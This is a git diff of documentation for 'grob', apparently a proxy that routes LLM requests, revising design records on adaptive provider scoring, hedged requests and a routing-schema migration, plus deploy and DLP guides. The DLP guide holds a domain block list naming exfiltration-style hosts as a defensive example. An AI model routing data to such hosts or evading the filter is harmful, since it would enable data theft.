-- **Predictability for compliance audits** — the routing must remain explainable; "the model picked DeepSeek because its EMA score was 0.85 vs Anthropic's 0.42" is acceptable, "we ran a black-box ML model" is not.
-- **Transparent to client** — Claude Code (or any client) should not see the internal switching. It calls `claude-sonnet-4-6` and gets a response; whether the response came from p1 or p3 is not visible in the response shape.
-- **Visible in telemetry** — operators need clear metrics to debug routing decisions and audit fallbacks.
-- **Backward compatible** — installations that prefer static priorities must continue to work unchanged.
+- **Use the schema that exists.** Provider names are stable today; endpoint IDs
+  are not.
+- **Keep the feature opt-in.** Static priority chains remain the default.
+- **Preserve explainability.** The score is a simple formula using success rate,
+  latency, and recency, with circuit-breaker overlay.
+- **Avoid schema churn.** Do not ship `[router.ema]` or endpoint metrics before
+  the endpoint schema exists.
+- **Keep hedging separate.** Scoring can improve fallback order without firing
+  speculative duplicate requests.
 
 ## Considered Options
 
-1. **EMA per-endpoint with configurable α and decay (chosen).** Each endpoint maintains an exponentially-weighted moving average of (success_rate, p95_latency, error_429_rate). On each request, the router picks the highest-scoring endpoint among the eligible ones (within tier filter, within priority chain). Default off; opt-in via `[router] adaptive_scoring = "ema"`.
-2. **Median-of-N rolling window.** Keep last N samples per endpoint, take the median. Rejected: more memory (~N×size_of(sample) per endpoint), no smoothing of bursty error rates, harder to tune the recovery curve.
-3. **Kalman filter or Bayesian inference.** Rejected: overkill for this signal class, harder to explain in compliance audits, and the parameter tuning effort dwarfs the gain.
-4. **Stay static, document the failure mode.** Rejected: the operator burden compounds as the number of endpoints grows. With ultra-cheap preset shipping 7 enabled providers, manual rebalancing is not realistic.
+1. **Per-endpoint EMA under `[router.ema]`.** Rejected for the current branch:
+   it depends on ADR-0022's endpoint identity model and would create a second
+   routing schema before migration tooling exists.
+2. **Provider-level adaptive scorer under `[security]` (chosen).** Fits the
+   current config shape, integrates with the existing circuit breaker, and gives
+   operators useful self-healing without schema migration.
+3. **Thompson sampling / weighted bandit.** Deferred. Probabilistic exploration
+   is harder to audit, and there is no endpoint schema or spend/audit protocol
+   to constrain exploration safely.
+4. **Static priorities only.** Rejected because it leaves transient provider
+   degradation entirely on the operator.
 
 ## Decision Outcome
 
-**Chosen: EMA per-endpoint, opt-in, transparent to client, fully observable.**
+Keep the current provider-level scorer as **adaptive provider scoring v1**.
 
 ### User-facing configuration
 
 ```toml
-[router]
-# Default: "static" preserves the existing priority-chain behavior.
-# "ema" enables exponentially-weighted health scoring as a tie-breaker
-# within the priority chain (does not change the chain itself).
-adaptive_scoring = "static"  # or "ema"
-
-[router.ema]
-# Smoothing factor 0..1. Higher = faster reaction to changes.
-# 0.3 means roughly 3-4 consecutive failures shift the score noticeably.
-alpha = 0.3
-
-# Decay half-life. After this duration with no signal, the EMA score
-# returns halfway to neutral (1.0). Prevents stale-penalty issues.
-decay_half_life = "1h"
-
-# Signals tracked. Each contributes equally to the composite score
-# unless `weights` overrides.
-signals = ["success_rate", "p95_latency", "error_429_rate"]
-
-# Optional per-signal weights (default: equal).
-[router.ema.weights]
-success_rate = 1.0
-p95_latency = 0.5
-error_429_rate = 1.0
-
-# Optional minimum score threshold. Below this, an endpoint is skipped
-# entirely (treated as if circuit-breaker tripped). Default: no skip.
-# Useful for compliance: "never route to an endpoint scoring below 0.3".
-skip_below = 0.3
+[security]
+adaptive_scoring = false        # opt-in; static priority order by default
+scoring_latency_alpha = 0.3     # EWMA alpha for latency smoothing
+scoring_window_size = 50        # rolling success-rate window
+scoring_decay_rate = 0.001      # confidence decay per second of inactivity
+scoring_persist = false         # reserved; not implemented yet
 ```
 
 ### Scoring formula
 
-```
-For each signal s observed in a request:
-    score_s_new = α × signal_s + (1 - α) × score_s_prev
+For each provider:
 
-Composite endpoint score:
-    composite = Σ (weight_s × score_s) / Σ weight_s
-    range: [0.0, 1.0], with 1.0 = healthy
-
-Idle decay (every N seconds, no traffic):
-    score_s = 1.0 - (1.0 - score_s) × 0.5^(elapsed / decay_half_life)
+```text
+success_rate = successes / recorded_outcomes
+latency_factor = 1 / (1 + latency_ewma_ms / 1000)
+confidence = max(1 - decay_rate * seconds_since_last_use, 0.3)
+composite = success_rate * latency_factor * confidence
 ```
+
+The circuit breaker overlays the raw score:
+
+| Circuit state | Adaptive factor |
+|---|---|
+| Closed | Raw composite score |
+| HalfOpen | `min(raw_score, 0.1)` |
+| Open | `0.0` |
 
 ### Routing integration
 
-The chain is unchanged. Within the chain, EMA only acts as a **gate** and a **tie-breaker**:
+When `adaptive_scoring = true`, `dispatch_provider_loop` asks the scorer to
+re-sort the selected model mappings before the provider fallback loop starts.
+The effective order is:
 
-1. Tier filter applies first (existing logic).
-2. Priority chain is walked top-to-bottom (existing logic).
-3. For each candidate endpoint, **if `adaptive_scoring = "ema"` and score < `skip_below`**, skip to next.
-4. The first acceptable candidate wins (no global score-max search; preserves predictability).
+```text
+effective_priority = declared_priority / adaptive_factor
+```
 
-Recovery is automatic: as the EMA score climbs back toward 1.0 (either from positive signal or idle decay), the endpoint re-enters the chain at its declared priority position.
+Lower effective priority is tried first. A provider with factor `0.0` is pushed
+to the end. This can reorder providers across declared priorities; it is not
+only a same-priority tie-breaker.
 
-### Transparent client contract
+## Non-goals and Deferred Work
 
-- The HTTP response shape is unchanged. `model: "claude-sonnet-4-6"` in the request returns `model: "claude-sonnet-4-6"` in the response, regardless of which provider actually served it.
-- The `provider` and `actual_model` are surfaced only in:
-  - Trace log (`~/.grob/trace.jsonl` if tracing enabled)
-  - Prometheus metrics (`grob_requests_total{provider, model}`)
-  - Optional response header `X-Grob-Routing: provider=anthropic;score=0.85;reason=ema-skip-deepseek`
-- Client tools (Claude Code, Cursor, Aider) never need to know switching happened.
+- **Per-endpoint scoring.** Useful conceptually, but it should wait for a
+  read-only internal endpoint adapter or a realistic ADR-0022 migration plan,
+  not a complete cut-over.
+- **`[router.ema]`.** Do not add a second operator-facing scoring schema while
+  `[security] adaptive_scoring` is the live implementation.
+- **Bandit / Thompson sampling.** Deferred until routing decisions have endpoint
+  identity, spend constraints, audit records, and an explicit opt-in story for
+  probabilistic exploration.
+- **Score persistence.** The `scoring_persist` field needs implementation or
+  removal; today it is a reserved knob.
 
-### Telemetry
+## Consequences
 
-New metrics surface routing decisions:
+### Positive
 
-| Metric | Labels | Type | Purpose |
-|---|---|---|---|
-| `grob_routing_endpoint_score` | `provider, model` | Gauge | Current composite EMA score 0..1 |
-| `grob_routing_endpoint_score_signal` | `provider, model, signal` | Gauge | Per-signal EMA values (debug) |
-| `grob_routing_skips_total` | `provider, model, reason` | Counter | When an endpoint is skipped: `ema_below_threshold`, `circuit_open`, `quota_exceeded` |
-| `grob_routing_recoveries_total` | `provider, model` | Counter | When a previously-skipped endpoint re-enters the chain |
-| `grob_routing_decisions_total` | `from_priority, served_by_priority` | Counter | Histogram of "intended vs actual" priority used |
+- Provides self-healing provider ordering without waiting for the endpoint
+  schema migration.
+- Reuses the existing circuit-breaker state and tests.
+- Exposes metrics that match the actual implementation.
+- Keeps the default behavior static and predictable.
 
-A Grafana dashboard template `grob-routing-ema.json` ships in `dashboards/` — operators can drop it in their existing instance and see endpoint health curves at a glance.
+### Negative
 
-### Positive Consequences
-
-- **Self-healing**: a 5-minute provider hiccup is absorbed without operator action; recovery is automatic.
-- **Operator visibility**: clear metrics, no black box.
-- **Backward compatible**: `adaptive_scoring = "static"` (default) preserves byte-for-byte existing behavior.
-- **Compliance-friendly**: every routing decision is explainable from the EMA values logged to trace.
-
-### Negative Consequences
-
-- **More state per process**: ~200 bytes per endpoint × ~50 endpoints in a heavy preset ≈ 10KB. Negligible.
-- **One extra atomic load per request**: the EMA score lookup. Sub-microsecond.
-- **Test surface widens**: deterministic property tests needed to lock the EMA arithmetic and decay.
-- **Tuning burden** (mild): operators may want to adjust α and decay for their workload pattern. Defaults are conservative.
-
-## Implementation Notes
-
-- New module `src/routing/ema.rs` exposing `EmaScorer` with `record_signal(endpoint_id, signal, value)` and `score(endpoint_id) -> f32`.
-- State stored in `Arc<DashMap<EndpointId, EmaState>>` for lock-free reads on the dispatch hot path.
-- Decay applied lazily on `score()` call (read timestamp, apply exponential decay since last update).
-- Atomic snapshot via `arc-swap` for hot-reload of weights / alpha / decay.
-- Integration point: `src/server/dispatch/mod.rs` between tier filter and provider call. ~50 LoC.
+- Provider-level scoring is coarse: two different models behind the same
+  provider share one score.
+- Reordering by `priority / factor` can override declared priority more strongly
+  than a pure gate would. This is intentional for v1 but must stay documented.
+- Persistence is not implemented despite the parsed `scoring_persist` field.
 
 ## Validation
 
-- Unit tests with deterministic time injection: alpha=0.5, three failures, verify score falls to expected value.
-- Property test: idempotent under no-op time advance.
-- Integration test: simulate a 5-minute provider outage, verify ≥80% of subsequent requests bypass the failing endpoint within the first 10 requests.
-- Bench: routing decision latency must remain < 100ns p99 (compared to ~50ns static priority).
-- Production canary: ship behind `adaptive_scoring = "ema"` opt-in, observe Grafana dashboard for 1 week before recommending the default flip in v0.40+.
+Current unit tests in `src/security/provider_scorer.rs` cover:
 
-## Configurability principle
+- New providers default to full score.
+- Rolling success-rate windows.
+- Latency EWMA arithmetic.
+- Failure-heavy providers receive low scores.
+- Better-scoring providers can move ahead of worse-scoring providers.
+- Open circuit breakers force score `0.0`.
 
-**Every parameter shipped here is a configurable default, not a hardcoded constant.** Operators override any value via `[router.ema]` in `~/.grob/config.toml`. The defaults below are guidance based on conservative-for-the-median-workload analysis; trading desks and security-prevails deployments are expected to tune their own.
-
-The default flip from `adaptive_scoring = "static"` to `"ema"` is **not a code change** — it is a default value in the config schema. Operators who want EMA earlier set it explicitly; operators who never want it leave it on `"static"` regardless of the project's recommendation.
-
-## Migration
-
-- Initial release shipping ADR-0019 code: `adaptive_scoring` config field added, default `"static"`. No behavior change for existing users.
-- Subsequent releases: gather feedback, optionally refine the default. Any shift of the default value is announced in the CHANGELOG one release ahead, never silently.
-- Operators are never blocked: they can set `adaptive_scoring = "static"` in their config and stay on the existing routing semantics indefinitely.
-
-## Audience-specific notes
-
-### Trading bots / time-sensitive callers
-
-EMA is most valuable here. The 60s circuit-breaker cooldown is unacceptable in a market-data loop; EMA-driven gating recovers in 5–10 requests after a transient provider issue and avoids hammering a degrading endpoint. Recommended defaults for this audience:
-
-- `alpha = 0.4` (faster reaction)
-- `decay_half_life = "15m"` (faster forget)
-- `skip_below = 0.5` (more aggressive gating)
-
-### Security-prevails customers (defense, banks, OIV)
-
-EMA decisions must be explainable in a compliance audit. Recommended posture:
-
-- `adaptive_scoring = "ema"` enabled but `skip_below` set to a high threshold (`0.6`+) so endpoints either route normally or get visibly excluded — no fuzzy intermediate cases.
-- The Prometheus metric `grob_routing_skips_total{reason="ema_below_threshold"}` becomes the audit signal: any non-zero value means the operator must justify the skip in the post-incident report.
-- The optional `X-Grob-Routing` response header MUST be enabled for these deployments — it carries the EMA score that drove the decision into the per-request audit log.
+Future endpoint-level scoring must add integration tests against the
+`[[endpoints]]` migration adapter before replacing this v1 provider scorer.

--- a/docs/decisions/0019-ema-stigmergy-endpoint-scoring.md
+++ b/docs/decisions/0019-ema-stigmergy-endpoint-scoring.md
@@ -10,6 +10,10 @@ related: [ADR-0018]
 
 # ADR-0019: EMA Stigmergy — Adaptive Endpoint Health Scoring
 
+## Implementation status
+
+Adaptive scoring now lives in the security layer as `src/security/provider_scorer.rs`, configured by `[security] adaptive_scoring` and the `scoring_*` knobs in `src/cli/config/security.rs`. The earlier `[router.ema]` examples and `src/routing/ema.rs` path below are historical design notes, not the current operator-facing schema.
+
 ## Context and Problem Statement
 
 Grob currently routes via static priority chains in `[[models.mappings]]`. When a high-priority endpoint degrades — slow responses, sporadic 429s, regional outages — grob keeps hammering it on every request until the operator manually edits the config and reloads.

--- a/docs/decisions/0020-hedged-requests.md
+++ b/docs/decisions/0020-hedged-requests.md
@@ -12,7 +12,7 @@ related: [ADR-0018, ADR-0019]
 
 ## Implementation status
 
-Hedged requests remain proposed. No `src/routing/hedge.rs`, hedge config, cancellation-billing protocol document, or hedge provider preset is present in the current tree. Paths and commands below describe the target implementation and must not be read as available runtime features.
+Hedged requests remain proposed. No `src/routing/hedge.rs`, hedge config, or hedge provider preset is present in the current tree. A cancellation-billing verification protocol now exists at `docs/how-to/verify-hedge-cancellation-billing.md`; paths and commands below otherwise describe the target implementation and must not be read as available runtime features.
 
 ## Context and Problem Statement
 
@@ -39,6 +39,33 @@ Cost trade-off: occasionally pay 2× for one logical request. In practice, only 
 ## Decision Outcome
 
 **Chosen: opt-in per slot, hard-coded threshold initially, with adaptive variant deferred.**
+
+### Implementation gate: spend/audit protocol first
+
+Do not implement hedging in dispatch until the spend and audit protocol is
+explicitly represented in code and tests. The current dispatch loop performs a
+single budget check before one upstream attempt, then records spend after the
+non-streaming response or streaming termination. Hedging changes that invariant:
+one logical request may create two billable upstream legs.
+
+Required protocol:
+
+1. Assign a `hedge_group_id` to the logical request and a `leg_id` to every
+   upstream attempt.
+2. Reserve budget for the maximum allowed in-flight legs before firing a hedge,
+   or fail closed when the budget cannot cover the duplicate call.
+3. Emit audit records for both primary and secondary legs: provider, model,
+   dispatch time, first byte time, cancellation request time, winner flag,
+   terminal status, and observed usage.
+4. Record actual billed spend per leg. The losing leg is not silently free; its
+   spend behavior depends on the operator-verified provider billing class.
+5. Disable hedging for providers whose cancellation billing behavior is
+   `unknown` or `no_refund`, unless the operator explicitly forces it.
+6. For streaming, forward only the winning stream to the client while still
+   draining/cancelling and auditing the losing leg best-effort.
+
+This protocol is the boundary between useful hedging and uncontrolled duplicate
+spend. It must land before `tokio::select!`-based dispatch code.
 
 ### User-facing configuration
 
@@ -122,8 +149,11 @@ With hedging (after_ms = 2000):
 - Dispatch site: `src/server/dispatch/mod.rs` after the primary endpoint is selected.
 - Use `tokio::select!` over (primary_future, hedge_timer_then_dispatch_future).
 - Cancellation: `JoinHandle::abort()` for the loser, plus a `Drop` impl on the upstream HTTP request body to terminate streaming early.
-- Token-counting must NOT bill the loser (audit log records both, billing pipeline must filter `winner=false` hedge legs from `grob_input_tokens_total`).
-- Test: `tests/integration/hedge_test.rs` with mock providers configurable to delay.
+- Token-counting must distinguish client-visible usage from provider-billed
+  usage. Request metrics mark the winner as the served response; spend records
+  actual billed cost for every leg according to the verified provider
+  cancellation behavior.
+- Test: `tests/integration/hedge_test.rs` with mock providers configurable to delay, bill loser legs differently, and assert budget reservation/release semantics.
 
 ## Validation
 

--- a/docs/decisions/0020-hedged-requests.md
+++ b/docs/decisions/0020-hedged-requests.md
@@ -10,6 +10,10 @@ related: [ADR-0018, ADR-0019]
 
 # ADR-0020: Hedged Requests — Tail-Latency Reduction via Speculative Duplication
 
+## Implementation status
+
+Hedged requests remain proposed. No `src/routing/hedge.rs`, hedge config, cancellation-billing protocol document, or hedge provider preset is present in the current tree. Paths and commands below describe the target implementation and must not be read as available runtime features.
+
 ## Context and Problem Statement
 
 Provider tail latency (P95 / P99) is the silent UX killer for interactive Claude Code sessions. The median DeepSeek V4-Flash response lands at ~700ms; the P99 lands at 8s+ when the provider's queue saturates. From the user's seat, a 8-second pause feels like the agent is stuck.

--- a/docs/decisions/0022-declarative-endpoints-policies-schema.md
+++ b/docs/decisions/0022-declarative-endpoints-policies-schema.md
@@ -5,10 +5,14 @@ deciders: [azerozero]
 consulted: []
 informed: []
 supersedes: []
-related: [ADR-0018, ADR-0019, ADR-0020, ADR-0021]
+related: [ADR-0018, ADR-0019, ADR-0020]
 ---
 
 # ADR-0022: Declarative `[[endpoints]]` and `[[policies]]` — Routing Schema Rebuild
+
+## Implementation status
+
+This schema rebuild remains proposed. The current `AppConfig` still uses `[[providers]]`, `[[models]]`, and `[[tiers]]`; no `endpoints` top-level field or `grob preset migrate-legacy` command is implemented. ADR-0021 was rejected before a standalone ADR file was created, so Thompson-sampling mentions below are historical design context rather than implemented or separately documented behavior.
 
 ## Context and Problem Statement
 

--- a/docs/decisions/0022-declarative-endpoints-policies-schema.md
+++ b/docs/decisions/0022-declarative-endpoints-policies-schema.md
@@ -12,7 +12,17 @@ related: [ADR-0018, ADR-0019, ADR-0020]
 
 ## Implementation status
 
-This schema rebuild remains proposed. The current `AppConfig` still uses `[[providers]]`, `[[models]]`, and `[[tiers]]`; no `endpoints` top-level field or `grob preset migrate-legacy` command is implemented. ADR-0021 was rejected before a standalone ADR file was created, so Thompson-sampling mentions below are historical design context rather than implemented or separately documented behavior.
+This schema rebuild remains proposed. The current `AppConfig` still uses
+`[[providers]]`, `[[models]]`, and `[[tiers]]`; no public `endpoints` top-level
+field or routing migration command is implemented. A read-only internal adapter
+now exists in `src/routing/endpoints.rs`: it derives an endpoint-shaped
+inventory and policy view from the legacy config without changing dispatch
+behavior. ADR-0021 was rejected before a standalone ADR file was created, so
+Thompson sampling is not part of this schema's current delivery plan.
+
+`[[endpoints]]` is useful conceptually, but it is a large migration. The first
+step is now the internal/read-only adapter; the next step is a realistic
+migration ADR with golden-file tests, not a complete cut-over.
 
 ## Context and Problem Statement
 
@@ -29,11 +39,11 @@ This was acceptable when grob had ~3 providers and 1 routing axis. With ADR-0018
 - "When session_id matches `enterprise-*`, only consider endpoints with SLA tags."
 - "Skip endpoints whose monthly quota is at 90%."
 
-ADR-0019 (EMA) and ADR-0020 (hedging) and ADR-0021 (Thompson) all bolt onto the existing schema with `[router]` sub-tables, but the underlying model — `[[providers]] × [[models]] × [[tiers]]` — is the wrong primitive set for richer policies.
+ADR-0019 (provider scoring) and ADR-0020 (hedging) can bolt onto the existing schema with local config, but the underlying model — `[[providers]] × [[models]] × [[tiers]]` — is the wrong primitive set for richer policies.
 
-The strategic question is: do we keep accreting `[router.X]` subsections to the existing schema, or do we cut over to a clean primitive set that scales?
+The strategic question is: do we keep accreting `[router.X]` subsections to the existing schema, or do we migrate toward a clean primitive set that scales?
 
-This ADR argues for the cut-over **with a 10-version auto-migration deprecation period** to protect the security-prevails audience that adopts grob mid-cycle.
+This ADR argues for a staged migration **with a 10-version deprecation period once the adapter exists** to protect the security-prevails audience that adopts grob mid-cycle.
 
 ## Decision Drivers
 
@@ -45,17 +55,22 @@ This ADR argues for the cut-over **with a 10-version auto-migration deprecation 
 ## Considered Options
 
 1. **Hard cut-over** (no backward compat, removed immediately). Rejected: any security-prevails adopter mid-flight gets locked out. Even with a migration tool, their compliance review cycle is months.
-2. **Auto-migration with 10-version deprecation period (chosen).** Both schemas parse for 10 minor releases. On startup, legacy configs are auto-converted in memory and the operator gets a deprecation warning pointing at the migration tool. After 10 minor releases, the legacy parser is removed and configs that haven't migrated fail fast at startup with a clear error.
+2. **Adapter-first migration with 10-version deprecation period (chosen target).** First add a read-only internal adapter that derives endpoint-like records from the legacy config. That adapter exists in `src/routing/endpoints.rs`. Only after it has broader golden-file tests should both schemas parse for 10 minor releases. On startup, legacy configs are auto-converted in memory and the operator gets a deprecation warning pointing at the migration tool. After 10 minor releases, the legacy parser is removed and configs that haven't migrated fail fast at startup with a clear error.
 3. **Indefinite co-existence.** Rejected: never gets the maintenance burden off the project. Test surface grows forever.
 4. **Stay on the old schema, push hard on `[router.*]` extensions.** Rejected: this is the path that produced the current sprawl.
 
 ## Decision Outcome
 
-**Chosen: 10-version auto-migration period.**
+**Chosen target: adapter-first migration, followed by a 10-version auto-migration period.**
 
-- Release N (next minor): both schemas parse. New schema is preferred internally; legacy is auto-converted in memory. Migration tool `grob preset migrate-legacy` available standalone.
+- Phase 0: build a read-only internal endpoint adapter from the existing
+  `[[providers]]`, `[[models]]`, and `[[tiers]]` config. Delivered in
+  `src/routing/endpoints.rs`. No new TOML syntax yet.
+- Release N (after adapter validation): both schemas parse. New schema is
+  preferred internally; legacy is auto-converted in memory. A routing migration
+  command is available standalone.
 - Releases N..N+9 (10 minor versions): legacy continues to auto-migrate. Each startup emits a single warn-level log line per legacy config, surfacing the operator-friendly migration command. Deprecation banner in `grob preset list`. Each release notes the remaining number of versions until removal.
-- Release N+10: legacy parser removed. Configs still in legacy format fail at startup with an actionable error: "your config uses the deprecated <feature>; run `grob preset migrate-legacy <path>` (deprecation announced in v<N>, see ADR-0022)".
+- Release N+10: legacy parser removed. Configs still in legacy format fail at startup with an actionable error that points at the routing migration command and ADR-0022.
 
 This gives security-prevails adopters ~12-18 calendar months (assuming monthly minor releases) to migrate, which fits typical compliance review cycles.
 
@@ -195,19 +210,36 @@ required_fields = ["jurisdiction", "data_classification", "certifications"]
 3. Apply `select` to filter [[endpoints]] to a candidate set.
 4. Apply `order_by` to sort the candidate set.
 5. Apply ADR-0019 EMA gate (skip endpoints below threshold).
-6. Apply ADR-0021 Thompson sampling (if enabled) within the sorted set.
-7. Dispatch to chosen endpoint. ADR-0020 hedge timer starts in parallel.
+6. Apply the deterministic load policy (`first`, `weighted`, `cheapest`, `fastest`, etc.).
+7. Dispatch to chosen endpoint. ADR-0020 hedge timer starts only if hedging is enabled and its spend/audit preconditions pass.
 ```
 
 ### Migration tool
 
-`grob preset migrate-legacy <input.toml> <output.toml>` converts a v0.36 config in-place:
+A future routing migration command converts a legacy config into the new schema:
 
 - For each `[[providers]]` with `models = [...]` → emit one `[[endpoints]]` per (provider, model) pair, defaults filled from a knowledge base shipped in the binary.
 - For each `[[models]]` priority chain → emit a `[[policies]]` with `when = { request.model_name = "..." }` and `select = { provider_in = [...] }` ordered by the original priorities.
 - For each `[[tiers]]` → emit a `[[policies]]` block with the tier's matchers as `when`.
 - `[endpoints.compliance]` blocks are NOT auto-populated (the legacy schema has no compliance metadata); migrated configs land with empty compliance blocks. The diff report calls this out so security-prevails ops can fill them in manually.
 - Print a diff report at the end: which signals were preserved, which require manual review (especially compliance blocks).
+
+### Phase 0 adapter semantics
+
+The internal adapter exposes two read-only collections:
+
+- `EndpointInventory.endpoints`: exact `(provider, actual_model)` endpoints
+  from `[[models.mappings]]`, exact provider inventory entries from legacy
+  `providers.models`, and wildcard pass-through endpoints for
+  `pass_through = true`.
+- `EndpointInventory.policies`: model policies with endpoint IDs in legacy
+  priority order, plus tier policies that preserve `providers` order and expose
+  known provider inventory.
+
+Tier policies deliberately keep `provider_order`: in the current resolver,
+`[[tiers]]` resolves the upstream model at request time by looking at the
+requested logical model and the selected provider. Pretending that every tier
+has fixed endpoint IDs would be a migration bug.
 
 ### Compliance metadata
 
@@ -274,15 +306,16 @@ This gives compliance teams a per-request proof that the routing decision satisf
 ### Added
 
 - **Routing schema** (ADR-0022): new `[[endpoints]]` and `[[policies]]`
-  primitives ship as the preferred routing config. Both schemas parse;
-  legacy is auto-converted in memory at startup.
+  primitives ship as the preferred routing config after the internal adapter
+  has been validated. Both schemas parse; legacy is auto-converted in memory
+  at startup.
 
 ### Deprecated
 
 - The legacy `[[models]]`, `[[tiers]]`, and per-provider `models = [...]`
   syntax are deprecated. Auto-migration runs at startup with a warn-level
   log line. Removal scheduled for the 10th minor release after this one.
-  Run `grob preset migrate-legacy ~/.grob/config.toml` to convert in place.
+  Run the routing migration command to convert in place.
 ```
 
 **Releases N+1..N+9 (intermediate, repeat the deprecation banner)**:
@@ -291,7 +324,7 @@ This gives compliance teams a per-request proof that the routing decision satisf
 ### Deprecated (reminder)
 
 - Legacy routing schema removal in **K minor releases** (where K = 9, 8, 7…).
-  Migration tool: `grob preset migrate-legacy`. See ADR-0022.
+  Migration tool: see ADR-0022.
 ```
 
 **Release N+10 (removal)**:
@@ -302,7 +335,7 @@ This gives compliance teams a per-request proof that the routing decision satisf
 - **Legacy routing schema removed** (ADR-0022, deprecated since release N).
   Configs still using `[[models]]` / `[[tiers]]` / `models = [...]` fail at
   startup with an actionable error. Migration tool unchanged:
-  `grob preset migrate-legacy ~/.grob/config.toml`. Operators who ignored
+  the routing migration command. Operators who ignored
   the 9 prior deprecation warnings: please open an issue with your config
   and we will prioritize your manual conversion.
 ```
@@ -326,7 +359,7 @@ This gives compliance teams a per-request proof that the routing decision satisf
 ## Implementation Notes
 
 - New module `src/routing/policy/` containing parsers, matchers, and dispatchers.
-- Migration tool: `src/preset/migrate_legacy.rs`, exposed via `grob preset migrate-legacy`.
+- Migration tool: not implemented. Proposed location and command name should be decided by the adapter/migration ADR, not hardcoded here.
 - Old code paths to remove: `src/server/helpers.rs::resolve_provider_mappings`, `src/routing/classify::tier_match`, the legacy `[[tiers]]` parser.
 - The 7 shipped presets (`perf`, `ultra-cheap`, `eu-eco`, `eu-pro`, `eu-max`, `gdpr`, `eu-ai-act`) must be rewritten to the new schema as part of this PR.
 - Snapshot tests in `tests/enterprise/preset_snapshot_test.rs` regenerate against the new schema.
@@ -342,7 +375,7 @@ This gives compliance teams a per-request proof that the routing decision satisf
 
 10-version auto-migration window:
 
-- **Release N** (announcement): both schemas parse. Legacy is auto-converted in memory at startup with a single warn-level log line per config. Migration tool `grob preset migrate-legacy` available standalone for operators who want to convert their on-disk config explicitly.
+- **Release N** (announcement): both schemas parse. Legacy is auto-converted in memory at startup with a single warn-level log line per config. A standalone routing migration command is available for operators who want to convert their on-disk config explicitly.
 - **Releases N+1..N+9**: legacy parser remains, deprecation warning repeats with the remaining version count. Each release notes the count in the CHANGELOG.
 - **Release N+10**: legacy parser removed. Configs still in legacy format fail at startup with an actionable error. The migration tool itself remains shipped indefinitely for late adopters who need to convert an old archived config.
 
@@ -351,7 +384,7 @@ Auto-migration behavior on legacy startup:
 ```
 [WARN grob::config] Your config uses the deprecated [[models]] / [[tiers]] schema.
                     Auto-migrating to [[endpoints]] / [[policies]] in memory for this run.
-                    Run `grob preset migrate-legacy ~/.grob/config.toml` to convert in place.
+                    Run the routing migration command to convert in place.
                     Legacy schema will be REMOVED in 9 minor releases (see ADR-0022).
 ```
 
@@ -430,7 +463,7 @@ Recommended trust setup: shipped trading-policy templates in `presets/trading.to
 The 10-version auto-migration window covers compliance review cycles. Mitigations baked into this ADR:
 
 - **Both schemas valid for ~12-18 calendar months** (10 minor releases at typical monthly cadence). Security teams have multiple validation cycles to test the new schema in staging against existing policies before the legacy parser is removed.
-- **Auto-migration is deterministic and verifiable** — the in-memory transformation must produce byte-identical routing decisions vs the legacy parser on a deterministic test corpus. CI gates this via a `grob preset migrate-legacy --verify` invocation that runs against a corpus stored at `tests/migration_corpus/`.
+- **Auto-migration is deterministic and verifiable** — the in-memory transformation must produce byte-identical routing decisions vs the legacy parser on a deterministic test corpus. CI gates this through the routing migration verifier against a corpus stored at `tests/migration_corpus/`.
 - **Audit-trail continuity**: requests previously logged under `tier=trivial` continue to log under `policy=trivial-cheapest-first` (or whatever the migrated policy name is). The migration tool emits a `routing_signal_mapping.toml` artifact that the audit-log post-processor uses to reconcile pre-migration and post-migration traffic in compliance reports.
 - **Structured `[endpoints.compliance]` block** (instead of a single `trust_zone` field): every endpoint declares 5 compliance dimensions in a typed sub-table — see *Compliance metadata* below.
 - **Compliance lint mode**: `grob policy validate --strict` rejects any policy whose `select` clause does not gate on at least one compliance field (the operator chooses which fields are mandatory via a configurable list; see *Compliance metadata*). Default off; enable in security-prevails deployments via `[router.compliance] strict = true`.

--- a/docs/explanation/architecture.md
+++ b/docs/explanation/architecture.md
@@ -75,11 +75,14 @@ flowchart TB
 
     client -->|"POST /v1/messages\nPOST /v1/chat/completions"| server
     server --> handler
-    handler --> routing
-    routing --> dispatch
+    handler --> dispatch
     dispatch --> dlp
-    dlp --> response
-    response --> client
+    dlp --> routing
+    routing --> dispatch
+    dispatch --> providers
+    providers --> response
+    response --> dlp
+    dlp --> client
 ```
 
 ## Module layout

--- a/docs/how-to/deploy.md
+++ b/docs/how-to/deploy.md
@@ -14,7 +14,7 @@ docker run -d \
   ghcr.io/azerozero/grob:latest
 ```
 
-The container runs `grob run --json-logs --host 0.0.0.0 --port 8080` by default.
+The container runs `grob run --json-logs --host 0.0.0.0 --port 8080` by default. Use `-p 13456:8080` if you want the native host default on the outside.
 
 ### With a config file
 
@@ -22,8 +22,9 @@ Mount your config:
 
 ```bash
 docker run -d \
-  -v ~/.grob/config.toml:/config.toml:ro \
-  -e GROB_CONFIG=/config.toml \
+  -v ~/.grob/config.toml:/etc/grob/config.toml:ro \
+  -e GROB_CONFIG=/etc/grob/config.toml \
+  -e GROB_HOME=/var/lib/grob \
   -e ANTHROPIC_API_KEY=sk-ant-... \
   -p 8080:8080 \
   ghcr.io/azerozero/grob:latest
@@ -45,16 +46,21 @@ A sample manifest is provided in `deploy/grob-kube.yml`. Key points:
 
 - Use a Secret for API keys
 - Mount config via ConfigMap or use remote config URL
+- Set `GROB_CONFIG=/etc/grob/config.toml` and `GROB_HOME=/var/lib/grob`
 - The health endpoint is `GET /health` (returns 200 with PID)
 - Metrics are at `GET /metrics` (Prometheus format)
-- The container runs as non-root (UID 65534)
+- The container runs as non-root (UID/GID 65534); hostPath volumes must be writable by that user
 
 ```yaml
 livenessProbe:
   httpGet:
-    path: /health
+    path: /live
     port: 8080
 readinessProbe:
+  httpGet:
+    path: /ready
+    port: 8080
+startupProbe:
   httpGet:
     path: /health
     port: 8080

--- a/docs/how-to/dlp.md
+++ b/docs/how-to/dlp.md
@@ -90,7 +90,7 @@ action = "block"
 languages = ["all"]
 ```
 
-Blocked requests return HTTP 400 with a DLP error. For monitoring before enforcement, use `action = "log"`.
+Blocked requests return HTTP 400 with a DLP error. For monitoring before enforcement, use `action = "log"`. Response and tool-result indirect injection uses `response_action`; set `response_action = "block"` if those paths should block too.
 
 To restrict scanning to specific languages:
 
@@ -120,7 +120,7 @@ When `whitelist_domains` is set, any URL with a domain NOT in the list is flagge
 
 ```toml
 whitelist_domains = []
-blacklist_domains = ["evil.com", "exfil.io"]
+blacklist_domains = ["evil.example", "exfil.invalid"]
 ```
 
 ## How to enable session isolation

--- a/docs/how-to/use-grob-hint.md
+++ b/docs/how-to/use-grob-hint.md
@@ -1,8 +1,9 @@
 # Use grob_hint to override request complexity
 
